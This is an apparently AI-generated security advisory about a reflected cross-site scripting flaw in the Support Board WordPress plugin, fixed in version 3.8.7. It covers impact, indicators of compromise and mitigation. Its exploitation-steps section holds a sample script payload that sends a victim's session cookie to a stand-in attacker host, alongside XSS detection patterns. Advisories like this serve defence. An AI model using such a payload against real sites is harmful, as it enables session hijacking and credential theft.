CVE-2025-60182
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-60182 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Schiocco Support Board WordPress plugin, classified under CWE-79. It affects all versions of the plugin prior to 3.8.7 and was reported by researcher Trương Hữu Phúc (truonghuuphuc) on July 1, 2025, with public disclosure on July 31, 2025. The vulnerability carries a CVSS v3.1 base score of 7.1 (Medium/High) (Patchstack).

Technical details

The vulnerability stems from improper neutralization of user-supplied input during web page generation (CWE-79), allowing malicious scripts to be reflected back to users without adequate sanitization or encoding. As a Reflected XSS, the attack is delivered via a crafted URL or link that, when clicked by a victim, causes the plugin to echo unsanitized input directly into the HTML response. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a privileged user must click a malicious link or visit a crafted page. The vulnerability is classified under OWASP Top 10 A3: Injection (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, redirection to malicious sites, or defacement of web content visible to the victim. The changed scope in the CVSS vector indicates the impact extends beyond the vulnerable component itself, potentially affecting other application components or users (Patchstack).

Exploitability

No public proof-of-concept exploit code or in-the-wild exploitation has been confirmed at this time. The EPSS score is approximately 0.029% (0.000290), indicating a low current probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of their size or popularity (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Support Board plugin in versions prior to 3.8.7 using tools like WPScan, Shodan, or Google dorks targeting the plugin's known file paths.
  2. Craft malicious URL: Construct a URL targeting the vulnerable parameter in the Support Board plugin that includes a reflected XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  3. Deliver the payload: Send the crafted URL to a target user (e.g., a site administrator) via phishing email, social engineering, or embedding it in a forum post or comment.
  4. Victim interaction: The victim clicks the malicious link, causing their browser to send the request to the vulnerable WordPress site, which reflects the unsanitized payload in the HTTP response.
  5. Script execution: The injected JavaScript executes in the victim's browser within the context of the WordPress site, enabling session cookie theft, credential harvesting, or unauthorized administrative actions (Patchstack).

Indicators of compromise

  • Network: HTTP requests to Support Board plugin endpoints containing URL-encoded JavaScript payloads (e.g., %3Cscript%3E, javascript:, onerror=, onload=) in query parameters; outbound connections from victim browsers to unknown external domains shortly after visiting the site.
  • Logs: WordPress or web server access logs showing GET/POST requests to Support Board plugin URLs with suspicious parameter values containing HTML tags or script fragments; repeated requests from varying IPs with similar XSS payload patterns.
  • File System: Unexpected modifications to Support Board plugin files or WordPress core files if an attacker escalated access following XSS exploitation.
  • Process/Behavior: Unusual admin-level actions in WordPress audit logs (e.g., new admin account creation, plugin installation) that may indicate successful session hijacking following XSS exploitation.

Mitigation and workarounds

The vendor Schiocco has released version 3.8.7 of the Support Board plugin, which patches this vulnerability. All users should update to version 3.8.7 or later immediately via the WordPress plugin dashboard. As an interim measure, Patchstack has issued a virtual patching/mitigation rule for its users to block exploitation attempts until the plugin is updated. If updating is not immediately possible, consider temporarily deactivating the plugin or restricting access to affected pages (Patchstack).

Community reactions

The vulnerability was discovered and reported through Patchstack's Vulnerability Disclosure Program (VDP) by researcher Trương Hữu Phúc (truonghuuphuc), who submitted the report on July 1, 2025. Patchstack classified it as medium priority and noted that XSS vulnerabilities of this type are frequently leveraged in mass WordPress exploitation campaigns. No significant broader media coverage or notable social media discussion has been identified beyond the Patchstack advisory (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management